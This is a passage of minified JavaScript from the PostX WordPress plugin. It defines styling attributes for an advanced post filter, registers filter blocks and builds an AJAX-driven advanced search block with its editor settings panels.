.ultp-filter-select__parent, {{ULTP}}.ultp-filter-button"}]},pBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent,{{ULTP}}.ultp-filter-button { border-radius:{{pBorderRadius}}; }"}]},pBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button"}]},pPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select__parent, {{ULTP}}.ultp-filter-button { padding:{{pPadding}}; }"}]},dAlign:{type:"string",default:"left",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner{ text-align:{{dAlign}}; }"}]},dWidthType:{type:"string",default:"auto"},dWidth:{type:"object",default:{lg:"200",unit:"px"},style:[{depends:[{key:"dWidthType",condition:"==",value:"fixed"}],selector:"{{ULTP}} .ultp-filter-select__dropdown { width: {{dWidth}}; }"}]},dTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner"}]},dColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner { color:{{dColor}}; }  {{ULTP}} .ultp-filter-select-options::-webkit-scrollbar-thumb{ background: {{dColor}}; }"}]},dColorHover:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner:hover { color:{{dColorHover}}; }"}]},dBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { background-color:{{dBgColor}}; } "}]},dBgColorHover:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner:hover { background-color:{{dBgColorHover}}; } "}]},dBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown"}]},dBorderRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { border-radius:{{dBorderRadius}}; }"}]},dBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown"}]},dSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown-inner { margin-bottom: {{dSpace}}; }"}]},dPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select__dropdown { padding:{{dPadding}}; }"}]},sTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sPlaceholderText:{type:"string",default:"Search..."},sColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search { color: {{sColor}}; } }"}]},sColorHover:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search:hover,\n                    {{ULTP}} .ultp-filter-select-search:focus { \n                        color:{{sColorHover}}; \n                    }"}]},sPlaceholderColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search::placeholder { color: {{sPlaceholderColor}}; } }"}]},sPlaceholderColorHover:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search::placeholder:hover {\n                        color:{{sPlaceholderColorHover}}; \n                    }"},{selector:"\n                    {{ULTP}} .ultp-filter-select-search::placeholder:focus { \n                        color:{{sPlaceholderColorHover}}; \n                    }"}]},sBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-filter-select-search { background-color:{{sBgColor}}; } "}]},sBgColorHover:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"\n                    {{ULTP}} .ultp-filter-select-search:hover,\n                    {{ULTP}} .ultp-filter-select-search:focus { \n                        background-color: {{sBgColorHover}}; \n                    }"}]},sBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_1_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sBorderHover:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Primary_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-filter-select-search:hover, {{ULTP}} .ultp-filter-select-search:focus"}]},sBorderRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { border-radius: {{sBorderRadius}}; }"}]},sBorderRadiusHover:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search:focus { border-radius: {{sBorderRadiusHover}}; }"},{selector:"{{ULTP}} .ultp-filter-select-search:hover { border-radius: {{sBorderRadiusHover}}; }"}]},sBoxShadow:{type:"object",default:{openShadow:0,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select-search"}]},sBoxShadowHover:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:0,left:1},color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-filter-select-search:focus"}]},sPadding:{type:"object",default:{lg:{top:"0",bottom:"0",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { padding:{{sPadding}}; }"}]},sMargin:{type:"object",default:{lg:{top:"0",bottom:"5",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-filter-select-search { margin:{{sMargin}}; }"}]}}},42177:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(9887),n=l(78501),r=l(50941),s=l(93180);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");p(r,{icon:s.L_,description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Block from PostX","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,variations:s.iQ,isDefault:!1,usesContext:["post-grid-parent/postBlockClientId"],ancestor:["ultimate-post/advanced-filter"],supports:{},edit:i.Z})},93180:(e,t,l)=>{"use strict";l.d(t,{L_:()=>n,iQ:()=>u});var o=l(67294);const{__}=wp.i18n,a=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/author-filter.svg"}),i=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/tags-filter.svg"}),n=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/category-filter.svg"}),r=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/order-by-filter.svg"}),s=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/order-filter.svg"}),p=(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/advanced-sort-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),c=(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/taxonomy-sort-filter.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),u=[{name:"tags",icon:i,title:__("Tags Filter","ultimate-post"),description:__("Filter posts by Tags","ultimate-post"),attributes:{type:"tags",allText:"All Tags"},isActive:["type"]},{name:"category",icon:n,title:__("Category Filter","ultimate-post"),description:__("Filter posts by Category","ultimate-post"),isDefault:!0,attributes:{type:"category",allText:"All Categories"},isActive:["type"]},{name:"author",title:__("Author Filter","ultimate-post"),icon:a,description:__("Filter posts by Author","ultimate-post"),attributes:{type:"author",allText:"All Authors"},isActive:["type"]},{name:"order",icon:s,title:__("Order Filter (Asc/Desc)","ultimate-post"),description:__("Orders posts","ultimate-post"),attributes:{type:"order"},isActive:["type"]},{name:"order_by",icon:r,title:__("Order By Filter","ultimate-post"),description:__("Orders posts by a Attribute","ultimate-post"),attributes:{type:"order_by"},isActive:["type"]},{name:"adv_sort",icon:p,title:__("Advanced Sort Filter","ultimate-post"),description:__("Orders posts (Advanced)","ultimate-post"),attributes:{type:"adv_sort",allText:"Advanced Sort"},isActive:["type"]},{name:"custom_tax",icon:c,title:__("Custom Taxonomy","ultimate-post"),description:__("Filter posts by Custom Taxonomy","ultimate-post"),attributes:{type:"custom_tax"},isActive:["type"]}];u.map((e=>"filter-select/"+e.name))},9544:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(4902),n=l(79060),r=l(70766),s=l(7110);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/advanced-post-filter/","block_docs");p(s,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/adv-filter/filter-icon.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Allow users to find specific posts using filters","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,providesContext:{"advanced-filter/cId":"clientId"},usesContext:["postId"],edit:i.Z,save:n.Z})},52021:(e,t,l)=>{"use strict";l.d(t,{Z:()=>f});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(83100),s=l(64766),p=l(16130);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useEffect:m,useState:g,useRef:y,Fragment:b}=wp.element,{getBlockAttributes:v,getBlockRootClientId:h}=wp.data.select("core/block-editor");function f(e){const t=y(null),[l,f]=g("Content"),[k,w]=g({postsList:"",emptyList:!1,viewAll:!1,loading:!1,error:!1,searchVal:"",searchNavPopup:!1,loadmore:1,totalPost:null}),{setAttributes:x,className:T,name:_,clientId:C,attributes:E,attributes:{blockId:S,currentPostId:P,searchAjaxEnable:L,moreResultsbtn:I,resImageEnable:B,resAuthEnable:U,resDateEnable:M,resCatEnable:A,resExcerptEnable:H,resExcerptLimit:N,moreResultPosts:j,searchPostType:Z,searchButtonText:O,searchInputPlaceholder:R,previewImg:D,advanceId:z,searchFormStyle:F,searchPopupIconStyle:W,searchnoresult:V,searchPopup:G,searchBtnText:q,searchBtnIcon:$,popupAnimation:K,moreResultsText:J,windowpopupHeading:Y,windowpopupText:X,blockPubDate:Q}}=e;function ee(e,t=!1,l=1){let o=j;I||(o=10,l=1,w({...k,postsList:""})),w({...k,postsList:t?"":k.postsList,loading:!0,emptyList:!1}),e&&e.length>2&&L?wp.apiFetch({path:"/ultp/ultp_search_data",method:"POST",data:{searchText:e,postPerPage:o,paged:l,image:B,author:U,category:A,date:M,excerpt:H,excerptLimit:N,exclude:Z.length>0&&JSON.parse(Z)}}).then((e=>{e.post_data.length>0?(w({...k,postsList:e.post_data,loading:!1,error:!1,emptyList:!1,totalPost:e.post_count}),w(t?{...k,postsList:e.post_data,loadmore:1}:{...k,postsList:k.postsList+e.post_data})):e.post_data.length<1&&w({...k,loading:!1,error:!1,loadmore:1,emptyList:!0})})).catch((e=>{console.log("error",e.message),w({...k,loading:!0,error:!0})})):w({...k,loading:!1,error:!1,viewAll:!1,loadmore:1})}function te(e,t=!0,l=!0){const a=t&&"popup-icon1"!=e;return(0,o.createElement)("div",{className:e?"ultp-searchpopup-icon ultp-searchbtn-"+e:"ultp-search-button"},l&&s.ZP.search_line,a&&(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-search-button__text",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({searchButtonText:e}),value:O}))}function le(e,t,l,a){const i=e?.length>0||k.loading&&k.totalPost!=k.postsList.length||k.emptyList&&0!=k.searchVal||t&&k.postsList.length>0&&0!=k.searchVal.length&&!(k.totalPost<k.loadmore*j);return(0,o.createElement)("div",{className:"ultp-search-result "+(i?"ultp-result-show":"")},(0,o.createElement)("div",{className:"ultp-result-data  "+(e?.length>0?"ultp-result-show":""),dangerouslySetInnerHTML:{__html:e}}),k.loading&&k.totalPost!=k.postsList.length&&(0,o.createElement)("div",{className:"ultp-search-result__item ultp-result-loader active"}),k.emptyList&&0!=k.searchVal&&(0,o.createElement)("div",{className:"ultp-search-result__item ultp-search-noresult active"},(0,o.createElement)(u,{key:"editable",tagName:"span",className:"ultp-search-button__text",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({searchnoresult:e}),value:a})),t&&k.postsList.length>0&&0!=k.searchVal.length&&!(k.totalPost<k.loadmore*j)&&k.totalPost-k.loadmore*j!=0&&(0,o.createElement)("div",{className:"ultp-backend-viewmore ultp-search-result__item ultp-viewall-results active",onClick:()=>w({...k,viewAll:!k.viewAll,loadmore:Number(k.loadmore)+1,loading:!0})},(0,o.createElement)(u,{key:"editable",tagName:"span",className:"",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({moreResultsText:e}),value:l}),"(",k.totalPost-k.loadmore*j,")"))}function oe(e,t,l){return(0,o.createElement)("div",{className:`ultp-searchform-content ultp-searchform-${e}`},(0,o.createElement)("div",{className:"ultp-search-inputwrap"},(0,o.createElement)("input",{type:"text",className:"ultp-searchres-input",value:k.searchVal,placeholder:R,onChange:e=>w({...k,searchVal:e.target.value})}),k.searchVal.length>2&&(0,o.createElement)("span",{className:"ultp-search-clear active","data-blockid":S,onClick:()=>w({...k,searchVal:"",postsList:"",loadmore:1})},s.ZP.close_line)),te(!1,t,l))}m((()=>{const e=C.substr(0,6),t=v(h(C));(0,a.qi)(x,t,P,C),S?S&&S!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||x({blockId:e})):x({blockId:e}),"empty"==Q&&x({blockPubDate:(new Date).toISOString()})}),[C]),m((()=>{const e=t.current;if(e){const t=e.moreResultPosts!==E.moreResultPosts||E.moreResultsbtn!==e.moreResultsbtn||e.resExcerptLimit!=E.resExcerptLimit||E.resExcerptEnable!=e.resExcerptEnable||e.searchPostType!=E.searchPostType;(e.searchVal!==k.searchVal||t)&&ee(k.searchVal,!0),e.loadmore!=k.loadmore&&ee(k.searchVal,!1,k.loadmore)}else t.current=E}),[E]);const ae={setAttributes:x,name:_,attributes:E,setSection:f,section:l,clientId:C};let ie;if(S&&(ie=(0,i.Kh)(E,"ultimate-post/advanced-search",S,(0,a.k0)())),D)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:D});const ne=0==k.searchVal.length?[]:k?.postsList,re=(0,r.Z)("","advanced_search",ultp_data.affiliate_id),se=d({...z&&{id:z},className:`ultp-block-${S} ${T}`});return(0,o.createElement)(b,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:ae})),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:ae}),(0,o.createElement)("div",se,ie&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ie}}),!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Search - PostX Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:re,target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/blocks/#demoid8233",target:"_blank",rel:"noreferrer"}," ","View Demo"))),(0,o.createElement)("div",{className:"ultp-block-wrapper "+(ultp_data.active?"":" ultp-wrapper-pro")},(0,o.createElement)("div",{className:"ultp-search-container "+(G?" popup-active ultp-search-animation-"+K:"")},G&&(0,o.createElement)("div",{onClick:()=>w({...k,searchNavPopup:!k.searchNavPopup,postsList:"",loading:!1})},te(W)),G&&(0,o.createElement)("div",{className:"ultp-search-popup"},(0,o.createElement)("div",{className:"ultp-canvas-wrapper "+(k.searchNavPopup?"canvas-popup-active":"")},(0,o.createElement)("div",{className:"ultp-search-canvas"},Y&&(0,o.createElement)(u,{key:"editable",tagName:"div",className:"ultp-search-popup-heading",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({windowpopupText:e}),value:X}),oe(F,q,$),L&&le(ne,I,J,V))),G&&"popup"!=K&&k.searchNavPopup&&(0,o.createElement)("div",{className:"ultp-popupclose-icon",onClick:()=>w({...k,searchVal:"",searchNavPopup:!1,postsList:"",loading:!1})},s.ZP.close_line)),!G&&oe(F,q,$)),L&&!G&&(0,o.createElement)("div",{className:"ultp-search-dropdown"},le(ne,I,J,V)))))}},16130:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=e=>{const{store:t}=e,{searchPopup:l,searchAjaxEnable:r,moreResultsbtn:s}=t.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8233",store:t}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{store:t,initialOpen:!0,title:__("Structure Setting","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"searchAjaxEnable",label:__("Ajax Search","ultimate-post")}},{position:2,data:{type:"select",key:"searchFormStyle",image:!0,defaultMedia:!0,label:__("Choose Search Form Style","ultimate-post"),options:[{label:"Input Style 1",value:"input1",img:"assets/img/layouts/search/inputform/input-form1.svg"},{label:"Input Style 2",value:"input2",img:"assets/img/layouts/search/inputform/input-form2.svg"},{label:"Input Style 3",value:"input3",img:"assets/img/layouts/search/inputform/input-form3.svg"}]}},{position:3,data:{type:"text",key:"searchnoresult",label:__("No Result Found Text","ultimate-post")}},{position:4,data:{type:"toggle",key:"searchPopup",label:__("Enable Search Popup","ultimate-post")}},{position:5,data:{type:"select",key:"searchPopupIconStyle",defaultMedia:!0,image:!0,label:__("Choose Popup Icon Style","ultimate-post"),options:[{label:"Popup Style 1",value:"popup-icon1",img:"assets/img/layouts/search/popupicon/search.svg"},{label:"Popup Style 2",value:"popup-icon2",img:"assets/img/layouts/search/popupicon/leftsearch.svg"},{label:"Popup Style 3",value:"popup-icon3",img:"assets/img/layouts/search/popupicon/rightsearch.svg"}]}},{position:6,data:{type:"search",key:"searchPostType",label:__("Exclude Post Type","ultimate-post"),multiple:!0,search:"allPostType",pro:!0}},{position:6,data:{type:"alignment",key:"searchIconAlignment",label:__("Popup Icon Alignment","ultimate-post"),disableJustify:!0}}]}),l&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Icon","ultimate-post"),include:[{position:1,data:{type:"range",key:"popupIconGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Text and Icon","ultimate-post")}},{position:2,data:{type:"range",key:"popupIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:3,data:{type:"typography",key:"popupIconTextTypo",label:__("Search Text Typography","ultimate-post")}},{position:4,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"popupIconColor",label:__("Color","ultimate-post")},{type:"color",key:"popupIconTextColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"popupIconBg",label:__("Background Color","ultimate-post")},{type:"border",key:"popupIconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"popupIconHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"popupIconTextHoverColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"popupIconHoverBg",label:__("Hover Background Color","ultimate-post")},{type:"border",key:"IconHoverBorder",label:__("Hover Border","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"popupIconPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:7,data:{type:"dimension",key:"popupIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Button","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"enableSearchPage",label:__("Click to go Search Result Page","ultimate-post")}},{position:2,data:{type:"toggle",key:"btnNewTab",label:__("Open In New Tab","ultimate-post")}},{position:3,data:{type:"toggle",key:"searchBtnText",label:__("Enable Text","ultimate-post")}},{position:4,data:{type:"toggle",key:"searchBtnIcon",label:__("Enable Icon","ultimate-post")}},{position:5,data:{type:"toggle",key:"searchIconAfterText",label:__("Icon After Text","ultimate-post")}},{position:6,data:{type:"toggle",key:"searchBtnReverse",label:__("Reverse Search Button","ultimate-post")}},{position:7,data:{type:"text",key:"searchButtonText",label:__("Search Button Text","ultimate-post")}},{position:8,data:{type:"range",key:"searchButtonPosition",min:0,max:300,step:1,responsive:!0,label:__("Button Gap","ultimate-post")}},{position:9,data:{type:"range",key:"searchTextGap",min:0,max:300,step:1,responsive:!0,label:__("Search Text Gap","ultimate-post")}},{position:10,data:{type:"range",key:"searchBtnIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:11,data:{type:"typography",key:"searchBtnTextTypo",label:__("Search Text Typography","ultimate-post")}},{position:12,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"searchBtnIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"searchBtnTextColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"searchBtnBg",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"searchBtnIconHoverColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"searchBtnTextHoverColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"searchBtnHoverBg",label:__("Hover Background Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Hover Border","ultimate-post")}]}]}},{position:13,data:{type:"dimension",key:"searchBtnPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:14,data:{type:"dimension",key:"searchBtnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}}]}),l&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Popup Canvas","ultimate-post"),include:[{position:1,data:{type:"select",key:"popupAnimation",image:!0,defaultMedia:!0,label:__("Popup  Type","ultimate-post"),options:[{label:"Popup",value:"popup",img:"assets/img/layouts/search/popuptype/popup.svg"},{label:"Top Window",value:"top",img:"assets/img/layouts/search/popuptype/topView.svg"},{label:"Full Window",value:"fullwidth",img:"assets/img/layouts/search/popuptype/fullWindow.svg"}]}},{position:2,data:{type:"separator",label:__("Search Popup Heading","ultimate-post")}},{position:3,data:{type:"toggle",key:"windowpopupHeading",label:__("Search Heading","ultimate-post")}},{position:4,data:{type:"alignment",key:"windowpopupHeadingAlignment",disableJustify:!0,label:__("Heading Alignment","ultimate-post")}},{position:5,data:{type:"text",key:"windowpopupText",label:__("Heading Text","ultimate-post")}},{position:6,data:{type:"typography",key:"windowpopupHeadingTypo",label:__("Search Heading Typography","ultimate-post")}},{position:7,data:{type:"color",key:"windowpopupHeadingColor",label:__("Search Heading Color","ultimate-post")}},{position:8,data:{type:"range",key:"popupHeadingSpacing",min:0,max:300,step:1,responsive:!0,label:__("Heading Spacing","ultimate-post")}},{position:9,data:{type:"separator",key:"popupCloseIconSeparator",label:__("Close Icon Style","ultimate-post")}},{position:10,data:{type:"range",key:"popupCloseSize",min:0,max:300,step:1,responsive:!0,label:__("Close Icon Size","ultimate-post")}},{position:11,data:{type:"color",key:"popupCloseColor",label:__("Close Icon Color","ultimate-post")}},{position:12,data:{type:"color",key:"popupCloseHoverColor",label:__("Close Icon Hover Color","ultimate-post")}},{position:13,data:{type:"separator",label:__("Canvas Wrapper Style","ultimate-post")}},{position:14,data:{type:"color2",key:"popupBG",label:__("Canvas Background","ultimate-post")}},{position:15,data:{type:"range",key:"canvasWidth",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Canvas Width","ultimate-post")}},{position:16,data:{type:"dimension",key:"popupPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:17,data:{type:"dimension",key:"popupRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:18,data:{type:"boxshadow",key:"popupShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}},{position:19,data:{type:"tag",key:"searchPopupPosition",label:__("Position Left/Right","ultimate-post"),options:[{value:"left",label:__("Start Left","ultimate-post")},{value:"right",label:__("Start Right","ultimate-post")}]}},{position:20,data:{type:"range",key:"popupPositionX",min:0,max:300,step:1,responsive:!0,label:__("Dropdown Position X","ultimate-post")}},{position:21,data:{type:"range",key:"popupPositionY",min:0,max:300,step:1,responsive:!0,label:__("Dropdown Position Y","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Form","ultimate-post"),include:[{position:1,data:{type:"text",key:"searchInputPlaceholder",label:__("Input Placeholder","ultimate-post")}},{position:2,data:{type:"typography",key:"inputTypo",label:__("Search Input Typography","ultimate-post")}},{position:3,data:{type:"range",key:"searchFormWidth",min:0,max:900,step:1,unit:!0,responsive:!0,label:__("Search Form Width","ultimate-post")}},{position:4,data:{type:"range",key:"inputHeight",min:0,max:300,step:1,responsive:!0,label:__("Input Height","ultimate-post")}},{position:5,data:{type:"color",key:"inputColor",label:__("Input Color","ultimate-post")}},{position:6,data:{type:"color2",key:"inputBg",label:__("Input Background","ultimate-post")}},{position:7,data:{type:"border",key:"inputFocusBorder",label:__("Input Focus Border","ultimate-post")}},{position:8,data:{type:"border",key:"inputBorder",label:__("Input Border","ultimate-post")}},{position:9,data:{type:"dimension",key:"inputPadding",step:1,unit:!0,responsive:!0,label:__("Input Padding","ultimate-post")}},{position:10,data:{type:"dimension",key:"inputRadius",step:1,unit:!0,responsive:!0,label:__("Input Radius","ultimate-post")}},{position:11,data:{type:"range",key:"searchClear",min:0,max:300,step:1,responsive:!0,label:__("Search Clear Icon Position","ultimate-post")}}]}),r&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Result","ultimate-post"),include:[{position:1,data:{type:"range",key:"resColumn",min:0,max:3,step:1,responsive:!0,label:__("Result Column","ultimate-post")}},{position:2,data:{type:"range",key:"resultGap",min:0,max:300,step:1,responsive:!0,label:__("Gap","ultimate-post")}},{position:3,data:{type:"toggle",key:"resExcerptEnable",label:__("Enable Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"resCatEnable",label:__("Enable Category","ultimate-post")}},{position:5,data:{type:"toggle",key:"resAuthEnable",label:__("Enable Author","ultimate-post")}},{position:6,data:{type:"toggle",key:"resDateEnable",label:__("Enable Publish Date","ultimate-post")}},{position:7,data:{type:"toggle",key:"resImageEnable",label:__("Enable Image","ultimate-post")}},{position:8,data:{type:"separator"}},{position:9,data:{type:"range",key:"resImageSize",min:0,max:300,step:1,responsive:!0,label:__("Image Size","ultimate-post")}},{position:9,data:{type:"dimension",key:"resImageRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:10,data:{type:"range",key:"resImageSpace",min:0,max:300,step:1,responsive:!0,label:__("Image Gap","ultimate-post")}},{position:11,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"resTitleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"resExcerptColor",label:__("Excerpt Color","ultimate-post")},{type:"color",key:"resMetaColor",label:__("Meta  Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"resTitleHoverColor",label:__("Title Hover Color","ultimate-post")},{type:"color",key:"resMetaHoverColor",label:__("Meta Hover Color","ultimate-post")}]}]}},{position:12,data:{type:"typography",key:"resTitleTypo",label:__("Title Typography","ultimate-post")}},{position:13,data:{type:"typography",key:"resMetaTypo",label:__("Meta Typography","ultimate-post")}},{position:14,data:{type:"typography",key:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}},{position:15,data:{type:"range",key:"resExcerptLimit",min:0,max:400,step:1,label:__("Excerpt Limit","ultimate-post")}},{position:16,data:{type:"separator",label:__("Meta Separator Style","ultimate-post")}},{position:17,data:{type:"range",key:"resultMetaSpace",min:0,max:300,step:1,responsive:!0,label:__("Meta Spacing","ultimate-post")}},{position:18,data:{type:"range",key:"resultMetaSeparatorSize",min:0,max:300,step:1,responsive:!0,label:__("Meta Separator Size","ultimate-post")}},{position:19,data:{type:"color",key:"resMetaSeparatorColor",label:__("Meta Separator Color","ultimate-post")}},{position:20,data:{type:"toggle",key:"resultHighlighter",label:__("Enable Highlighter","ultimate-post")}},{position:21,data:{type:"color",key:"resultHighlighterColor",label:__("Highlighter Color","ultimate-post")}},{position:22,data:{type:"separator",label:__("Wrapper Style","ultimate-post")}},{position:23,data:{type:"color2",key:"resultBg",label:__("Background 